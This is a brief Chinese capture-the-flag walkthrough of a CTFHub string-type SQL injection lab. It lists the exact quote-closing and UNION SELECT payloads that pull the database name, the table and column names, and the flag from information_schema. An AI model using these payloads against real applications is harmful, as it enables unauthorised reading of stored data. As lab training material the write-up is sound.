CTFHUB--技能树SQL注入{字符型注入}

1.打开环境，输入1

可以看到输入内容被单引号方式获取以字符输入

2.闭合

在1后面加一个引号，然后使用#将后面的引号注释掉

输入      1‘#

3.查询数据库名称

输入     

-1' union select 1,database()#

 4.查询表名

输入

-1' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#

5.查询字段名

输入

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'#

6.获取flag

-1' union select 1,flag from sqli.flag#